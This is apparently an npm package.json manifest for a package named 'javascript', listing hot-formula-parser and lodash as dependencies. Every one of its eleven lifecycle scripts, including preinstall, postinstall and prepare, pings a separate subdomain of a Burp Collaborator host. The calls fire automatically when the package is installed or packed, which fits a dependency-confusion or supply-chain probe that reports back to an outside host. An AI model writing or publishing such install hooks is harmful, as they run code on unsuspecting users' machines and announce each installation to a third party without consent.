{
  "name": "javascript",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "dependencies": {
    "hot-formula-parser": "^3.0.0",
    "lodash": "^1.17.20"
  },
   "scripts": {
    "precompress": "ping x.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "compress": "ping xx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "postcompress": "ping xxx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "prepare": "ping xxxx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "prepublish": "ping xxxxx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "prepublishOnly": "ping xxxxxx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "prepack": "ping xxxxxxxx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "postpack": "ping xxxxxxxxx.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "preinstall": "ping x1.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "postinstall": "ping x2.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net",
    "preprepare": "ping x3.9r1onccy4ndut97zi9gtvopmhdn5bu.burpcollaborator.net"
  }
}
